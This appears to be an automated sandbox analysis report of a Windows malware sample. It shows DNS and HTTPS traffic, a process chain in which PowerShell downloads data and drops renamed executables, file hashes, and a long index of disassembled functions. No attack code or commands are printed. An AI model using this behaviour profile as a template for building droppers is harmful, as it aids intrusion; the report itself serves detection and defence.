Oct 7, 2024 21:30:06.909497976 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:07.073082924 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:07.302570105 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 7, 2024 21:30:01.833945036 CEST | 55241 | 53 | 192.168.2.4 | 1.1.1.1 |
Oct 7, 2024 21:30:02.072568893 CEST | 53 | 55241 | 1.1.1.1 | 192.168.2.4 |
Oct 7, 2024 21:30:10.590367079 CEST | 64582 | 53 | 192.168.2.4 | 1.1.1.1 |
Oct 7, 2024 21:30:10.606520891 CEST | 53 | 64582 | 1.1.1.1 | 192.168.2.4 |
Oct 7, 2024 21:30:30.059900045 CEST | 49345 | 53 | 192.168.2.4 | 1.1.1.1 |
Oct 7, 2024 21:30:30.076343060 CEST | 53 | 49345 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 7, 2024 21:30:01.833945036 CEST | 192.168.2.4 | 1.1.1.1 | 0x55e8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 7, 2024 21:30:10.590367079 CEST | 192.168.2.4 | 1.1.1.1 | 0xf90c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 7, 2024 21:30:30.059900045 CEST | 192.168.2.4 | 1.1.1.1 | 0x488a | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 7, 2024 21:30:02.072568893 CEST | 1.1.1.1 | 192.168.2.4 | 0x55e8 | No error (0) | 83.140.241.4 | A (IP address) | IN (0x0001) | false | ||
Oct 7, 2024 21:30:10.606520891 CEST | 1.1.1.1 | 192.168.2.4 | 0xf90c | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Oct 7, 2024 21:30:30.076343060 CEST | 1.1.1.1 | 192.168.2.4 | 0x488a | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49730 | 83.140.241.4 | 443 | 7364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-07 19:30:02 UTC | 191 | OUT | |
2024-10-07 19:30:03 UTC | 395 | IN | |
2024-10-07 19:30:03 UTC | 15989 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN | |
2024-10-07 19:30:03 UTC | 16384 | IN |
Target ID: | 0 |
Start time: | 15:29:57 |
Start date: | 07/10/2024 |
Path: | C:\Users\user\Desktop\T6l6gPxwQU.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6bb120000 |
File size: | 1'974'272 bytes |
MD5 hash: | FCA042B18ADF613D9A2BE1646663698F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 15:29:58 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff788560000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 15:29:58 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 15:30:06 |
Start date: | 07/10/2024 |
Path: | C:\Users\Public\InformationCheck.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x530000 |
File size: | 893'608 bytes |
MD5 hash: | C56B5F0201A3B3DE53E561FE76912BFD |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 15:30:09 |
Start date: | 07/10/2024 |
Path: | C:\Windows\SysWOW64\cmd.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x240000 |
File size: | 236'544 bytes |
MD5 hash: | D0FCE3AFA6AA1D58CE9FA336CC2B675B |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 15:30:09 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 15:30:20 |
Start date: | 07/10/2024 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7e48a0000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 10 |
Start time: | 15:30:23 |
Start date: | 07/10/2024 |
Path: | C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x8a0000 |
File size: | 893'608 bytes |
MD5 hash: | C56B5F0201A3B3DE53E561FE76912BFD |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 2.4% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 12.4% |
Total number of Nodes: | 1429 |
Total number of Limit Nodes: | 30 |
Graph
Function 00007FF6BB1237B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145 window COMMON
Function 00007FF6BB126580 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 208 COMMON
Function 00007FF6BB141D80 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251 COMMON
Function 00007FF6BB1BF630 Relevance: 12.4, APIs: 8, Instructions: 350 process COMMON
Function 00007FF6BB132E30 Relevance: 6.5, APIs: 2, Strings: 1, Instructions: 1264 COMMON
Function 00007FF6BB127920 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 178 registry COMMON
Function 00007FF6BB125DEC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143 window time registry COMMON
Function 00007FF6BB123D90 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57 window registry COMMON
Function 00007FF6BB13E958 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 304 com COMMON
Function 00007FF6BB123B84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60 window registry COMMON
Function 00007FF6BB1325BC Relevance: 12.4, APIs: 8, Instructions: 442 window time COMMON
Function 00007FF6BB123CBC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40 COMMON
Function 00007FF6BB127EC0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185 com COMMON
Function 00007FF6BB1272C8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80 window COMMON
Function 00007FF6BB123F04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69 COMMON
Function 00007FF6BB1366C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466 COMMON
Function 00007FF6BB15B3C0 Relevance: 3.0, APIs: 2, Instructions: 19 memory COMMON LIBRARYCODE
Function 00007FF6BB15DDA8 Relevance: 1.3, APIs: 1, Instructions: 36 memory COMMON LIBRARYCODE
Function 00007FF6BB15C51C Relevance: 1.3, APIs: 1, Instructions: 29 memory COMMON LIBRARYCODE
Function 00007FF6BB1B56A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1D17C0 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CCE8C Relevance: 69.5, APIs: 46, Instructions: 540windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CBA0C Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1CDB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B32AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB144514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB12183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB18CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB122AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1B0A6C Relevance: 30.2, APIs: 20, Instructions: 169clipboardCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB16529C Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1C0AEC Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 388registryCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB125F3C Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 223COMMON
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1A72A8 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 284timefileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB1AA350 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 112fileCOMMON
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FF6BB19D87C Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 66 COMMON
Function 00007FF6BB1AA4F8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104 file COMMON
Function 00007FF6BB1A59D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 96 COMMON
Function 00007FF6BB1B0D24 Relevance: 15.1, APIs: 10, Instructions: 86 clipboard memory COMMON
Function 00007FF6BB19B7C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 171 file COMMON
Function 00007FF6BB1B3940 Relevance: 12.1, APIs: 8, Instructions: 116 network COMMON
Function 00007FF6BB1B8360 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 331 COMMON
Function 00007FF6BB19BC70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86 file COMMON
Function 00007FF6BB15AF58 Relevance: 9.1, APIs: 6, Instructions: 83 COMMON LIBRARYCODE
Function 00007FF6BB1B7E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237 COMMON
Function 00007FF6BB121CEC Relevance: 7.6, APIs: 5, Instructions: 124 keyboard COMMON
Function 00007FF6BB15793C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262 COMMON
Function 00007FF6BB162D20 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169 COMMON
Function 00007FF6BB1584C0 Relevance: 7.1, APIs: 4, Instructions: 1071 COMMON LIBRARYCODE
Function 00007FF6BB19D750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50 shutdown COMMON
Function 00007FF6BB145BC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42 COMMON LIBRARYCODE
Function 00007FF6BB1932F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19 library loader COMMON
Function 00007FF6BB151750 Relevance: 4.8, APIs: 3, Instructions: 340 COMMON LIBRARYCODE
Function 00007FF6BB162F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110 COMMON
Function 00007FF6BB1AE968 Relevance: 3.1, APIs: 2, Instructions: 97 network file COMMON
Function 00007FF6BB1595B0 Relevance: 2.9, Strings: 2, Instructions: 378 COMMON LIBRARYCODE
Function 00007FF6BB182BCF Relevance: 1.5, APIs: 1, Instructions: 6 COMMON
Function 00007FF6BB14C130 Relevance: 1.5, Strings: 1, Instructions: 219 COMMON LIBRARYCODE
Function 00007FF6BB14BEB4 Relevance: 1.4, Strings: 1, Instructions: 199 COMMON LIBRARYCODE
Function 00007FF6BB1358D0 Relevance: .7, Instructions: 692 COMMON
Function 00007FF6BB12B390 Relevance: .7, Instructions: 682 COMMON
Function 00007FF6BB12B9F0 Relevance: .6, Instructions: 577 COMMON
Function 00007FF6BB1530DC Relevance: .5, Instructions: 535 COMMON
Function 00007FF6BB166DE4 Relevance: .2, Instructions: 194 COMMON
Function 00007FF6BB1A1A18 Relevance: .1, Instructions: 66 COMMON
Function 00007FF6BB15FD20 Relevance: .0, Instructions: 32 COMMON
Function 00007FF6BB1459C8 Relevance: .0, Instructions: 2 COMMON
Function 00007FF6BB1CE95C Relevance: 49.7, APIs: 33, Instructions: 231 window COMMON
Function 00007FF6BB1A4F30 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 247 COMMON
Function 00007FF6BB1CECB4 Relevance: 39.2, APIs: 26, Instructions: 179 window COMMON
Function 00007FF6BB1C6EA0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 268 window COMMON
Function 00007FF6BB192C10 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 175 window time COMMON
Function 00007FF6BB1D1254 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162 window file COMMON
Function 00007FF6BB1A3FD0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 197 COMMON
Function 00007FF6BB1D0118 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 175 window library COMMON
Function 00007FF6BB1D03D0 Relevance: 22.6, APIs: 15, Instructions: 131 file com memory COMMON
Function 00007FF6BB1A0D70 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 388 COMMON
Function 00007FF6BB1A246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281 file COMMON
Function 00007FF6BB1A8BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162 time COMMON
Function 00007FF6BB1B4F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151 window COMMON
Function 00007FF6BB18B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117 memory COMMON
Function 00007FF6BB1C1110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371 COMMON
Function 00007FF6BB1A3268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135 COMMON
Function 00007FF6BB1974B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128 window COMMON
Function 00007FF6BB19D4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65 sleep window time COMMON
Function 00007FF6BB197E64 Relevance: 18.2, APIs: 12, Instructions: 173 keyboard COMMON
Function 00007FF6BB18FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243 window time COMMON
Function 00007FF6BB19176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226 COMMON
Function 00007FF6BB121504 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163 window COMMON
Function 00007FF6BB1A34E4 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149 COMMON
Function 00007FF6BB18C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124 registry share COMMON
Function 00007FF6BB1CAD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100 window COMMON
Function 00007FF6BB1A3E20 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 97 file COMMON
Function 00007FF6BB197BA0 Relevance: 16.6, APIs: 11, Instructions: 106 keyboard COMMON
Function 00007FF6BB1B2A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174 network file COMMON
Function 00007FF6BB15D504 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117 COMMON LIBRARYCODE
Function 00007FF6BB1976D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77 window COMMON
Function 00007FF6BB18E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74 window COMMON
Function 00007FF6BB19CA98 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59 network COMMON
Function 00007FF6BB1D0D7C Relevance: 15.2, APIs: 10, Instructions: 209 window COMMON
Function 00007FF6BB18F7F4 Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 471 COMMON
Function 00007FF6BB1B767C Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 231 COMMON
Function 00007FF6BB1CA350 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 139 window COMMON
Function 00007FF6BB18D780 Relevance: 13.6, APIs: 9, Instructions: 54 memory thread COMMON
Function 00007FF6BB1D0B24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 142 window COMMON
Function 00007FF6BB19A070 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 135 window COMMON
Function 00007FF6BB19AD94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 70 window COMMON
Function 00007FF6BB1BFCC0 Relevance: 12.2, APIs: 8, Instructions: 246 registry COMMON
Function 00007FF6BB160BBC Relevance: 10.8, APIs: 7, Instructions: 294 COMMON LIBRARYCODE
Function 00007FF6BB1ADBF0 Relevance: 10.6, APIs: 7, Instructions: 137 network COMMON
Function 00007FF6BB1B37A8 Relevance: 10.6, APIs: 7, Instructions: 103 network COMMON
Function 00007FF6BB1C15C4 Relevance: 10.6, APIs: 7, Instructions: 90 registry COMMON
Function 00007FF6BB1CAEDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69 window COMMON
Function 00007FF6BB19FAFC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65 pipe COMMON
Function 00007FF6BB19F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65 pipe COMMON
Function 00007FF6BB14A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492 COMMON
Function 00007FF6BB19D1F0 Relevance: 9.1, APIs: 6, Instructions: 131 file string COMMON
Function 00007FF6BB12D4CC Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 119 COMMON
Function 00007FF6BB19DA1C Relevance: 9.0, APIs: 6, Instructions: 34 window time thread COMMON
Function 00007FF6BB18F378 Relevance: 9.0, APIs: 6, Instructions: 33 thread window time COMMON
Function 00007FF6BB18D868 Relevance: 9.0, APIs: 6, Instructions: 22 memory synchronization COMMON
Function 00007FF6BB1BCDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233 COMMON
Function 00007FF6BB190EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187 COMMON
Function 00007FF6BB199898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127 COMMON
Function 00007FF6BB159B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121 COMMON LIBRARYCODE
Function 00007FF6BB19B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95 file string COMMON
Function 00007FF6BB18DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92 window COMMON
Function 00007FF6BB1AD914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86 network COMMON
Function 00007FF6BB1C93E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76 window library COMMON
Function 00007FF6BB149164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29 library loader COMMON
Function 00007FF6BB1689B4 Relevance: 7.8, APIs: 5, Instructions: 265 COMMON LIBRARYCODE
Function 00007FF6BB15ED08 Relevance: 7.7, APIs: 5, Instructions: 203 COMMON LIBRARYCODE
Function 00007FF6BB1C0084 Relevance: 7.6, APIs: 5, Instructions: 141 registry COMMON
Function 00007FF6BB1BD0F8 Relevance: 7.6, APIs: 5, Instructions: 139 library loader COMMON
Function 00007FF6BB162998 Relevance: 7.6, APIs: 5, Instructions: 133 COMMON LIBRARYCODE
Function 00007FF6BB15BA2C Relevance: 7.6, APIs: 5, Instructions: 114 library loader COMMON LIBRARYCODE
Function 00007FF6BB18D924 Relevance: 7.6, APIs: 5, Instructions: 91 sleep window COMMON
Function 00007FF6BB15F9D4 Relevance: 7.6, APIs: 5, Instructions: 56 COMMON LIBRARYCODE
Function 00007FF6BB192ED0 Relevance: 7.5, APIs: 5, Instructions: 37 window time COMMON
Function 00007FF6BB1A0008 Relevance: 7.5, APIs: 5, Instructions: 33 synchronization thread COMMON
Function 00007FF6BB1A6D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308 com COMMON
Function 00007FF6BB1A5F2C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 300 com COMMON
Function 00007FF6BB160040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205 COMMON
Function 00007FF6BB14B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150 COMMON LIBRARYCODE
Function 00007FF6BB18EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127 window COMMON
Function 00007FF6BB15EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100 file COMMON LIBRARYCODE
Function 00007FF6BB1CB454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96 COMMON
Function 00007FF6BB1CAB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83 window COMMON
Function 00007FF6BB1CB798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80 window COMMON
Function 00007FF6BB1A4DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75 COMMON
Function 00007FF6BB1CB104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66 window COMMON
Function 00007FF6BB18F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64 window COMMON
Function 00007FF6BB19C110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58 file COMMON
Function 00007FF6BB1BAF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21 library loader COMMON
Function 00007FF6BB1B7634 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20 library loader COMMON
Function 00007FF6BB126D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20 library loader COMMON
Function 00007FF6BB1C10C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20 library loader COMMON
Function 00007FF6BB126D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20 library loader COMMON
Function 00007FF6BB198B38 Relevance: 6.1, APIs: 4, Instructions: 96 keyboard window COMMON
Function 00007FF6BB198CAC Relevance: 6.1, APIs: 4, Instructions: 89 keyboard window COMMON
Function 00007FF6BB1950E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69 string COMMON
Function 00007FF6BB19CF68 Relevance: 6.1, APIs: 4, Instructions: 55 synchronization thread window COMMON
Function 00007FF6BB15B778 Relevance: 6.0, APIs: 4, Instructions: 43 COMMON LIBRARYCODE
Function 00007FF6BB15CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245 COMMON LIBRARYCODE
Function 00007FF6BB191D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200 com COMMON
Function 00007FF6BB15D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138 COMMON LIBRARYCODE
Function 00007FF6BB15A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106 COMMON
Function 00007FF6BB1C9E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89 COMMON
Function 00007FF6BB1B5E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88 network COMMON
Function 00007FF6BB1B03C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81 COMMON
Function 00007FF6BB1CB224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73 COMMON
Function 00007FF6BB15DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70 COMMON
Function 00007FF6BB1CA0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65 COMMON
Function 00007FF6BB1C9868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64 window COMMON
Function 00007FF6BB1C9BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63 window COMMON
Function 00007FF6BB15FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57 COMMON
Function 00007FF6BB18DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50 window COMMON
Function 00007FF6BB18DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45 window COMMON
Function 00007FF6BB18DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45 window COMMON
Function 00007FF6BB1CFEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40 process COMMON
Function 00007FF6BB18DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39 window COMMON
Function 00007FF6BB1615B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37 COMMON
Function 00007FF6BB1614E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34 COMMON
Function 00007FF6BB1614FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34 COMMON
Function 00007FF6BB161370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33 COMMON
Function 00007FF6BB1475C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21 COMMON LIBRARYCODE
Function 00007FF6BB145620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11 COMMON